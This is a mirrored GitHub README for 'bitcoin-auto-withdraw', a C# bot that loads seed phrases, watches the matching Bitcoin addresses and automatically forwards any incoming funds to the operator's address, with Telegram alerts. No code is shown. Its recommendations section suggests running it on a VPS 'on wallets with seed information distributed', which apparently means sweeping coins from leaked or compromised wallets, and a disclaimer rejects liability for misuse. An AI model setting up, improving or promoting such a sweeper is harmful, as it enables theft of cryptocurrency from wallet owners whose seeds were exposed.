Giter Club home page Giter Club logo

by-unknown / bitcoin-auto-withdraw Goto Github PK

View Code? Open in Web Editor NEW
6.0 8.0 5.0 54.34 MB

Bitcoin Auto Withdraw is a tool designed to automate Bitcoin withdrawals to a specified address upon receiving funds in a Bitcoin wallet. The tool tracks transfers to a specific address and forwards them automatically.

License: MIT License

C# 100.00%
api auto-withdraw auto-withdraw-bot auto-withdraw-script bitcoin bitcoin-api bitcoin-cash bitcoin-transaction bitcoin-wallet bitcoin-withdraws

bitcoin-auto-withdraw's Introduction

Bitcoin Auto Withdraw

This Tool is a tool used to perform automatic withdrawals as soon as money arrives in Bitcoin wallets. In particular, it ensures that transfers to a specific Bitcoin address are automatically routed to a specific address.

Installation

  • Open the solution file (.sln).
  • Replace YOUR_TELEGRAM_BOT_TOKEN, YOUR_CHAT_ID and YOUR_BTC_ADDRESS in Program.cs with your own information.
  • Add seed to the ./Release\address.txt file in the main directory of the project.
  • Select Build Solution from the Build menu to compile the project or select Start Without Debugging from the Debug menu or press Ctrl+F5 to run the project.

Requirements

  • Visual Studio 2022
  • .NET Core SDK 3.1 or higher
  • NBitcoin and NBitcoin.RPC packages
  • TelegramBot packages
  • Costura packages

Usage

When the project is running, it tracks each transfer to a specific address in your Bitcoin wallet. If a transfer occurs to the specified address, it automatically sends that transfer to another address.

Settings

The address.txt file in the project contains seed expressions and their corresponding Bitcoin addresses. You can edit this file with any text editor. Also, to receive notifications via Telegram, you need to create a bot and write your bot and target chat ID in the places specified in the Program.cs file.

Recommendations

  • Connect a Specific VPS/VDS to Keep it Active After Compiling the Code.
  • You can use this code on wallets with seed information distributed.
  • If you want to test the code yourself, try it with small quantities.

Contribution

If you would like to contribute to this project, please leave a star in the repo.

Disclaimer

No liability arising from the use or misuse of this software is accepted. Users must use this software at their own risk.

License

This project is licensed under the MIT. For more information, see the License.

bitcoin-auto-withdraw's People

Contributors

zsluqa avatar zunknown0 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.